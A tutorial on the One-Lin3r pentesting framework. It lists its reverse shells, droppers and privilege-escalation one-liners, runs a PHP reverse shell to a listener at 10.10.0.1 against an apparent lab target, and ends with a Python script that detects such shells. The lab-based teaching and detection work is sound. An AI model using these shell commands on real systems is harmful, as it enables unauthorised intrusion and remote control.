A lot of time can be wasted performing trivial tasks over and over again, and it's especially true when it comes to hacking and penetration testing. Trying different shells to own a target, and testing out privilege escalation commands afterward, can eat up a lot of time. Fortunately, there is a tool called One-Lin3r that can quickly generate shells, privesc commands, and more.
One-Lin3r is a Python tool that acts as a framework to automate the generation of one-liners commonly used in pentesting and hacking. Its usage is very similar to Metasploit, so it's natural and simple to pick up for most people. The tool contains features such as auto-complete, search suggestion, automatic copying, and smart searching, making it a breeze to find whatever you're looking for.
The first thing we need to do is install One-Lin3r. It requires Python 3, so the easiest way to do this is with pip3. It will install the tool along with any dependencies it may need.
    ~# pip3 install one-lin3r
    Collecting one-lin3r
      Downloading https://files.pythonhosted.org/packages/87/bc/603e4262e3e268e0e2ff54f7f87bbc638f5c4356f893396e2575379bc0cb/one_lin3r-2.0-py3-none-any.whl (100kB)
        100% |████████████████████████████████| 102kB 1.4MB/s
    Collecting terminaltables (from one-lin3r)
      Downloading https://files.pythonhosted.org/packages/9b/c4/4a21174f32f8a7e1104798c445dacdc1d4df86f2f26722767034e4de4bff/terminaltables-3.1.0.tar.gz
    Requirement already satisfied: pyperclip in /usr/lib/python3/dist-packages (from one-lin3r) (1.6.4)
    Requirement already satisfied: prompt-toolkit in /usr/local/lib/python3.7/dist-packages (from one-lin3r) (2.0.9)
    Requirement already satisfied: wcwidth in /usr/local/lib/python3.7/dist-packages (from prompt-toolkit->one-lin3r) (0.1.7)
    Requirement already satisfied: six>=1.9.0 in /usr/lib/python3/dist-packages (from prompt-toolkit->one-lin3r) (1.12.0)
    Installing collected packages: terminaltables, one-lin3r
      Running setup.py install for terminaltables ... done
    Successfully installed one-lin3r-2.0 terminaltables-3.1.0
We can run the basic help menu by tacking on the -h flag:
    ~# one-lin3r -h
    usage: One-Lin3r.py [-h] [-r R] [-x X] [-q]

    optional arguments:
      -h, --help  show this help message and exit
      -r R        Execute a resource file.
      -x X        Execute a specific command (use ; for multiples).
      -q          Quiet mode (no banner).
One-Lin3r is a framework, so to really get into it, we need to start it up. Simply type one-lin3r in the terminal to do so:
    ~# one-lin3r
    [ASCII-art banner]
    One-Lin3r By D4Vinci - V2.0
    A framework where all your liners belongs to...
    Loaded 155 liner(s).

    OneLiner >
Once it starts, we're greeted with a banner, much like what happens when starting the Metasploit Framework. In fact, most of the commands and usage of this tool are very similar to Metasploit, so most of us should feel right at home.
Typing help or ? will give us the detailed help menu:
    OneLiner > ?

    Command                  Description
    --------                 -------------
    help/?                   Show this help menu.
    list/show                List all one-liners in the database.
    search [Keywords..]      Search database for a specific liner by its name, author name or description.
    use <liner>              Use an available one-liner.
    copy <liner>             Use an available one-liner and copy it to clipboard automatically.
    info <liner>             Get information about an available liner.
    set <variable> <value>   Sets a context-specific variable to a value to use while using one-liners.
    variables                Prints all previously specified variables.
    banner                   Display banner.
    reload/refresh           Reload the liners database.
    check                    Prints the core version and checks if you are up-to-date.
    history                  Display command-line most important history from the beginning.
    makerc                   Save command-line history to a file.
    resource <file>          Run the commands stored in a file
    os <command>             Execute a system command without closing the framework
    exit/quit                Exit the framework
Since we are restricted to the framework prompt while running One-Lin3r, it's useful to be able to run operating system commands while working. Use the os keyword followed by whatever command you wish to run to do this:
    OneLiner > os uname -a
    Linux drd 4.19.0-kali5-amd64 #1 SMP Debian 4.19.37-5kali1 (2019-06-20) x86_64 GNU/Linux
We can use the list command to display all of the available one-liners the tool has to offer. It will list the names and associated functions of each one.
    OneLiner > list

    # | Name | Function
    -----+-------------------------------------------------------------+---------------
    1 | multi/nmap/slowloris_attack | Nmap script
    2 | multi/nmap/google_malware_check | Nmap script
    3 | multi/nmap/http_enumerate | Nmap script
    4 | multi/nmap/full_vulnerability_scan | Nmap script
    5 | multi/nmap/common_malware_scan | Nmap script
    6 | multi/nmap/ftp_bruteforce | Nmap script
    7 | openbsd/nc/bind_udp | Bind Shell
    8 | openbsd/nc/reverse_tcp | Reverse Shell
    9 | openbsd/bash/read_doas_config | PrivEsc
    10 | windows/scan/check_netapi | Nmap script
    11 | windows/scan/check_eternal_blue | Nmap script
    12 | windows/python/bind_udp | Bind Shell
    13 | windows/python/bind_tcp | Bind Shell
    14 | windows/python/reverse_tcp | Reverse Shell
    15 | windows/python/reverse_tcp_threaded | Reverse Shell
    16 | windows/php/bind_udp | Bind Shell
    17 | windows/php/bind_tcp | Bind Shell
    18 | windows/powershell/meterpreter_shell | Reverse Shell
    19 | windows/powershell/get_iis_config | PrivEsc
    20 | windows/powershell/bind_tcp | Bind Shell
    21 | windows/powershell/ps1_dropper_microsoft_syncappv | Dropper
    22 | windows/powershell/list_installed_programs_using_registry | PrivEsc
    23 | windows/powershell/reverse_tcp | Reverse Shell
    24 | windows/powershell/setup_powerup_powertools | PrivEsc
    25 | windows/powershell/ps1_dropper | Dropper
    26 | windows/powershell/list_unqouted_services | PrivEsc
    27 | windows/powershell/get_saved_wifi_passwords | PrivEsc
    28 | windows/powershell/get_passwords_from_memory_using_mimikatz | PrivEsc
    29 | windows/powershell/setup_keylogger_powersploit | Keylogger
    30 | windows/powershell/list_running_processes | PrivEsc
    31 | windows/powershell/ps1_dropper_rundll32 | Dropper
    32 | windows/powershell/list_scheduled_tasks | PrivEsc
    33 | windows/powershell/setup_session_gopher | PrivEsc
    34 | windows/powershell/reverse_tcp_string | Reverse Shell
    35 | windows/powershell/list_installed_programs_using_folders | PrivEsc
    36 | windows/groovysh/reverse_tcp | Reverse Shell
    37 | windows/cmd/bat_dropper | Dropper
    38 | windows/cmd/hta_dropper_mshta | Dropper
    39 | windows/cmd/list_logon_requirements | PrivEsc
    40 | windows/cmd/dll_dropper_rundll32 | Dropper
    41 | windows/cmd/read_registry_vnc_passwords | PrivEsc
    42 | windows/cmd/read_registry_snmp_key | PrivEsc
    43 | windows/cmd/read_registry_run_key | PrivEsc
    44 | windows/cmd/read_registry_winlogon_key | PrivEsc
    45 | windows/cmd/read_registry_r_key | PrivEsc
    46 | windows/cmd/list_routing_tables | PrivEsc
    47 | windows/cmd/exe_dropper_certutil | Dropper
    48 | windows/cmd/list_startup_folder_currentuser | PrivEsc
    49 | windows/cmd/search_registry_for_passwords_cu | PrivEsc
    50 | windows/cmd/list_network_interfaces | PrivEsc
    51 | windows/cmd/sct_dropper_rundll32 | Dropper
    52 | windows/cmd/get_saved_wifi_aps_ssid | PrivEsc
    53 | windows/cmd/list_users | PrivEsc
    54 | windows/cmd/read_registry_putty_sessions | PrivEsc
    55 | windows/cmd/get_systeminfo | PrivEsc
    56 | windows/cmd/dll_dropper_regasm | Dropper
    57 | windows/cmd/list_startup_tasks_with_wmic | PrivEsc
    58 | windows/cmd/search_registry_for_passwords_lm | PrivEsc
    59 | windows/cmd/execute_c#_files | Execute
    60 | windows/cmd/list_user_privileges | PrivEsc
    61 | windows/cmd/list_network_shares | PrivEsc
    62 | windows/cmd/search_for_passwords | PrivEsc
    63 | windows/cmd/read_services_with_tasklist | PrivEsc
    64 | windows/cmd/runas_with_creds | Execute
    65 | windows/cmd/list_unqouted_services | PrivEsc
    66 | windows/cmd/read_services_with_wmic | PrivEsc
    67 | windows/cmd/list_current_connections | PrivEsc
    68 | windows/cmd/get_saved_wifi_passwords | PrivEsc
    69 | windows/cmd/sct_dropper_mshta | Dropper
    70 | windows/cmd/read_registry_runonce_key | PrivEsc
    71 | windows/cmd/dll_dropper_certutil_base64 | Dropper
    72 | windows/cmd/msi_quiet_installer | Execute
    73 | windows/cmd/list_startup_folder_allusers | PrivEsc
    74 | windows/cmd/sct_dropper_regsvr32 | Dropper
    75 | windows/cmd/list_drives | PrivEsc
    76 | windows/cmd/msi_dropper_wininstaller | Dropper
    77 | windows/cmd/list_installed_updates | PrivEsc
    78 | windows/cmd/list_localgroups | PrivEsc
    79 | windows/cmd/list_running_processes | PrivEsc
    80 | windows/cmd/read_firewall_config | PrivEsc
    81 | windows/cmd/list_arp_tables | PrivEsc
    82 | windows/cmd/xsl_dropper_wmic | Dropper
    83 | windows/cmd/list_scheduled_tasks | PrivEsc
    84 | windows/cmd/execute_over_forfiles | Execute
    85 | windows/cmd/list_processes_running_as_system | PrivEsc
    86 | windows/cmd/read_registry_always_install_elevated_key_cu | PrivEsc
    87 | windows/cmd/exe_dropper_bitsadmin | Dropper
    88 | windows/cmd/dll_loader_control_panel | Loader
    89 | windows/cmd/win_remote_management | Execute
    90 | windows/cmd/dll_loader_word | Loader
    91 | windows/cmd/read_registry_always_install_elevated_key_lm | PrivEsc
    92 | windows/cmd/get_snmp_config | PrivEsc
    93 | windows/cmd/get_architecture | PrivEsc
    94 | windows/nc/bind_tcp | Bind Shell
    95 | windows/nc/reverse_tcp | Reverse Shell
    96 | windows/lua/reverse_tcp | Reverse Shell
    97 | windows/perl/bind_udp | Bind Shell
    98 | windows/perl/bind_tcp | Bind Shell
    99 | windows/perl/reverse_tcp | Reverse Shell
    100 | windows/ruby/bind_udp | Bind Shell
    101 | windows/ruby/bind_tcp | Bind Shell
    102 | windows/ruby/reverse_tcp | Reverse Shell
    103 | linux/awk/bind_tcp | Bind Shell
    104 | linux/awk/reverse_tcp | Reverse Shell
    105 | linux/awk/reverse_udp | Reverse Shell
    106 | linux/java/reverse_tcp | Reverse Shell
    107 | linux/go/reverse_tcp | Reverse Shell
    108 | linux/python/bind_udp | Bind Shell
    109 | linux/python/bind_tcp | Bind Shell
    110 | linux/python/reverse_tcp | Reverse Shell
    111 | linux/python/reverse_tcp_interactive | Reverse Shell
    112 | linux/python/reverse_udp | Reverse Shell
    113 | linux/php/bind_udp | Bind Shell
    114 | linux/php/bind_tcp | Bind Shell
    115 | linux/php/reverse_tcp | Reverse Shell
    116 | linux/openssl/reverse_tcp | Reverse Shell
    117 | linux/ncat/reverse_tcp_ssl | Reverse Shell
    118 | linux/ncat/reverse_tcp | Reverse Shell
    119 | linux/ncat/reverse_udp | Reverse Shell
    120 | linux/socat/bind_udp | Bind Shell
    121 | linux/socat/reverse_tcp | Reverse Shell
    122 | linux/tclsh/reverse_tcp | Reverse Shell
    123 | linux/nodejs/reverse_tcp | Reverse Shell
    124 | linux/nc/reverse_tcp_mkfifo | Reverse Shell
    125 | linux/nc/bind_tcp | Bind Shell
    126 | linux/nc/reverse_tcp_mknod | Reverse Shell
    127 | linux/nc/bind_tcp_mkfifo | Bind Shell
    128 | linux/nc/reverse_tcp | Reverse Shell
    129 | linux/nc/reverse_udp | Reverse Shell
    130 | linux/lua/reverse_tcp | Reverse Shell
    131 | linux/lua/reverse_tcp_bash | Reverse Shell
    132 | linux/perl/bind_udp | Bind Shell
    133 | linux/perl/reverse_udp_miosocket | Reverse Shell
    134 | linux/perl/bind_tcp | Bind Shell
    135 | linux/perl/reverse_tcp | Reverse Shell
    136 | linux/perl/reverse_tcp_miosocket | Reverse Shell
    137 | linux/telnet/reverse_tcp_mkfifo | Reverse Shell
    138 | linux/telnet/reverse_tcp_mknod | Reverse Shell
    139 | linux/ruby/bind_udp | Bind Shell
    140 | linux/ruby/bind_tcp | Bind Shell
    141 | linux/ruby/reverse_tcp | Reverse Shell
    142 | linux/bash/list_cronjobs_for_another_user | PrivEsc
    143 | linux/bash/list_cronjobs_for_current_user | PrivEsc
    144 | linux/bash/list_all_capabilities | PrivEsc
    145 | linux/bash/reverse_tcp | Reverse Shell
    146 | linux/bash/exploit_docker_bash_container | PrivEsc
    147 | linux/bash/search_for_password_using_grep | PrivEsc
    148 | linux/bash/search_for_password_using_find | PrivEsc
    149 | linux/bash/search_for_password_in_memory | PrivEsc
    150 | linux/bash/exploit_writeable_sudoers | PrivEsc
    151 | linux/bash/find_suid | PrivEsc
    152 | linux/bash/reverse_tcp_exec | Reverse Shell
    153 | linux/bash/list_cronjobs_for_all_users | PrivEsc
    154 | linux/bash/list_systemd_timers | PrivEsc
    155 | linux/bash/get_last_edited_files | PrivEsc
We can also search for specific items using the search command. This is something that One-Lin3r is really good at. It not only has auto-complete capabilities, but it also knows what you are trying to search for by offering suggestions and allowing partial search terms.
For instance, let's say we wanted some kind of PHP shell for Linux. We don't need to type the full path for the tool to find what we are looking for.
    OneLiner > search linux php

    # | Name                  | Function
    ---+-----------------------+---------------
    1 | linux/php/bind_udp    | Bind Shell
    2 | linux/php/bind_tcp    | Bind Shell
    3 | linux/php/reverse_tcp | Reverse Shell
We can get information about a specific one-liner with the info command, which will give us a short description of the item, including its author, function, and variables that are used.
    OneLiner > info linux/php/reverse_tcp
    [+] Liner added by => vesche
    [+] Function       => Reverse Shell
    [+] Variables used => TARGET, PORT
    [+] Description    => Uses PHP sockets & exec to create a reverse shell.
Once we've found a suitable item, we can load it with the use command:
    OneLiner > use linux/php/reverse_tcp
    [+] Your liner is:
    php -r '$sock=fsockopen("TARGET",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
Once we do this, it will give us the actual line that we need to copy and run. In this example, we can see there are parameters for the target and port. To display current variables and their associated values, simply type variables at the prompt:
    OneLiner > variables

    # | Name      | Value
    ---+-----------+-------
    1 | TARGET    | None
    2 | PORT      | None
    3 | URL       | None
    4 | COMMAND   | None
    5 | FILE_PATH | None
    6 | USERNAME  | None
    7 | PASSWORD  | None
Now we are able to set values for these variables, much like how we do in Metasploit. Since we are generating a reverse shell here, we need to set the target to the IP address of our local machine:
    OneLiner > set target 10.10.0.1
    [+] Variable target set to 10.10.0.1
And the desired port so it can connect back to our listener:
    OneLiner > set port 4321
    [+] Variable port set to 4321
Now when we display the variables again, we can see that our values are set:
    OneLiner > variables

    # | Name      | Value
    ---+-----------+-----------
    1 | TARGET    | 10.10.0.1
    2 | PORT      | 4321
    3 | URL       | None
    4 | COMMAND   | None
    5 | FILE_PATH | None
    6 | USERNAME  | None
    7 | PASSWORD  | None
Let's try this out. First, we need to set up a listener so we can catch the incoming connection from the target. Netcat is always a good choice:
    ~# nc -lvp 4321
    listening on [any] 4321 ...
Next, load the one-liner to get the full command. We can see that the target and port variables are now filled in with our values:
    OneLiner > use linux/php/reverse_tcp
    [+] Your liner is:
    php -r '$sock=fsockopen("10.10.0.1",4321);exec("/bin/sh -i <&3 >&3 2>&3");'
We could just copy this command like normal, but One-Lin3r actually has a feature to automate this for us. Instead of loading an item with the use command, load it with the copy command — this will automatically copy what we need right to the clipboard:
    OneLiner > copy linux/php/reverse_tcp
    [+] Your liner is:
    php -r '$sock=fsockopen("10.10.0.1",4321);exec("/bin/sh -i <&3 >&3 2>&3");'
    [+] Liner copied to clipboard successfully!
From here, it's time to exploit the target. Feel free to do this however you want, but command injection is always a favorite of mine. Once we exploit the target and run our reverse shell command, we should see a connection open up on our local machine:
    10.10.0.50: inverse host lookup failed: Unknown host
    connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 56718
    sh: no job control in this shell
    sh-3.2$ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
We can now run commands like id to verify we have compromised a user on the system.
Now that we have a shell on the system as a limited user, the next step to take would be privilege escalation. Fortunately, One-Lin3r also contains some handy privesc commands for us to generate.
First things first, let's upgrade this shell we have to a fully interactive TTY session so we have more control over what we're doing.
Now that we have a decent shell, let's find a potential privesc command to use. I usually like to work out of a world-writable directory during post-exploitation so I can write and execute whatever I want — /var/tmp is a good bet:
    www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ cd /var/tmp
Now, back in One-Lin3r, we can search for an appropriate privesc for Linux:
    OneLiner > search linux privesc

    # | Name                                      | Function
    ----+-------------------------------------------+----------
    1 | linux/bash/list_cronjobs_for_another_user | PrivEsc
    2 | linux/bash/list_cronjobs_for_current_user | PrivEsc
    3 | linux/bash/list_all_capabilities          | PrivEsc
    4 | linux/bash/exploit_docker_bash_container  | PrivEsc
    5 | linux/bash/search_for_password_using_grep | PrivEsc
    6 | linux/bash/search_for_password_using_find | PrivEsc
    7 | linux/bash/search_for_password_in_memory  | PrivEsc
    8 | linux/bash/exploit_writeable_sudoers      | PrivEsc
    9 | linux/bash/find_suid                      | PrivEsc
    10 | linux/bash/list_cronjobs_for_all_users    | PrivEsc
    11 | linux/bash/list_systemd_timers            | PrivEsc
    12 | linux/bash/get_last_edited_files          | PrivEsc
Let's take a look at this one, which will list any cron jobs for the current user:
    OneLiner > info linux/bash/list_cronjobs_for_current_user
    [+] Liner added by => Karim shoair (D4Vinci)
    [+] Function       => PrivEsc
    [+] Variables used => None
    [+] Description    => List all crob jobs for current user
Seems pretty straightforward, and we don't even need to set any variables. Use the copy command to copy it straight to the clipboard:
    OneLiner > copy linux/bash/list_cronjobs_for_current_user
    [+] Your liner is:
    crontab -l
    [+] Liner copied to clipboard successfully!
We can see it still tells us what it generates, but we save an extra step by copying the command automatically. The only thing left to do is run the one-liner on the target:
    www-data@metasploitable:/var/tmp$ crontab -l
    no crontab for www-data
We can see in this particular instance there are no cron jobs for this user, but One-Lin3r makes it easy to have some common privesc commands right at our fingertips.
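Seen from the target's side, both steps in this walkthrough (the `php -r` reverse shell and the `crontab -l` run as www-data) leave distinctive process command lines. The following is an added example, not code from this article or from One-Lin3r, of detection logic over process-execution events; the `(user, command line)` event shape, the `SERVICE_ACCOUNTS` set and the finding labels are assumptions made for illustration.

```python
import re
import shlex

# Constructed (user, command line) process events, shaped like exec telemetry.
SAMPLE_EVENTS = [
    ("www-data", """php -r '$sock=fsockopen("10.10.0.1",4321);exec("/bin/sh -i <&3 >&3 2>&3");'"""),
    ("www-data", "crontab -l"),
    ("www-data", "php /var/www/dvwa/index.php"),
    ("alice", "crontab -l"),
    ("root", "php -r 'echo PHP_VERSION;'"),
]

SERVICE_ACCOUNTS = {"www-data", "apache", "nginx"}  # assumption: tune per host

# PHP functions that open an outbound socket from inline code.
SOCKET_CALL = re.compile(
    r"\b(fsockopen|pfsockopen|stream_socket_client|socket_create)\s*\(", re.I)
# Interactive shell bound to an inherited descriptor, e.g. "/bin/sh -i <&3 >&3".
SHELL_ON_FD = re.compile(r"(?:^|[\s\"'/])(?:ba|da|z|k)?sh\s+-i\b[^;]*[<>]&\d")
CRON_LIST = re.compile(r"^\s*crontab\s+-l\b")

def php_inline_code(cmdline):
    """Return the code given to `php -r` / `--run`, or None for other commands."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: fall back to whitespace splitting
        argv = cmdline.split()
    if not argv or not argv[0].rsplit("/", 1)[-1].startswith("php"):
        return None
    for flag in ("-r", "--run"):
        if flag in argv[1:-1]:
            return " ".join(argv[argv.index(flag) + 1:])
    return None

def classify(user, cmdline):
    """Return the finding labels (hypothetical names) for one event."""
    findings = []
    code = php_inline_code(cmdline)
    if code and SOCKET_CALL.search(code) and SHELL_ON_FD.search(code):
        findings.append("php-inline-reverse-shell")
    if user in SERVICE_ACCOUNTS:
        if code is not None:
            findings.append("service-account-php-inline")
        if CRON_LIST.search(cmdline):
            findings.append("service-account-cron-enumeration")
    return findings

def scan(events):
    """Keep only the events that produced at least one finding."""
    return [(u, c, f) for u, c in events if (f := classify(u, c))]

if __name__ == "__main__":
    for user, cmd, labels in scan(SAMPLE_EVENTS):
        print(user, labels, cmd, sep=" | ")
```

The benign entries in the sample (a PHP script served by www-data, a human user listing their own crontab, root running a harmless `php -r`) produce no findings, which is the behaviour to preserve when tuning the patterns.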
Today, we explored a tool called One-Lin3r and how to use it to quickly generate shells, privilege escalation commands, and more. We tested it out by using a PHP reverse shell to compromise the target, then tried to escalate privileges by generating a command to check for cron jobs. With an interface that feels familiar to any Metasploit user, One-Lin3r makes it easy to hack on the fly.